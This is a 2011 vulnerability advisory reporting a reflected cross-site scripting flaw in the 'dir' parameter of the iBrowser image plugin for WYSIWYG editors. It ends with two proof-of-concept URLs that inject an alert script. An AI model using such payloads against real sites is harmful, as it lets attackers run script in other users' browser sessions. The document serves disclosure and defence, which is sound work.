iBrowser Plugin v1.4.1 (dir) Remote Cross-Site Scripting Vulnerability


Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.4.1 Build 10182009

Summary: iBrowser is an image browser plugin for WYSIWYG editors like
tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions.
It allows image browsing, resizing on upload, directory management and
more with the integration of the phpThumb image library.

Desc: iBrowser suffers from a XSS vulnerability when parsing user input
to the 'dir' parameter via GET method in 'random.php' and 'phpThumb.demo.random.php'.
Attackers can exploit this weakness to execute arbitrary HTML and script
code in a user's browser session.


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5044
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5044.php


15.09.2011

--

http://SOME_CMS/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert('zsl')</script>
http://SOME_CMS/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert('zsl')</script>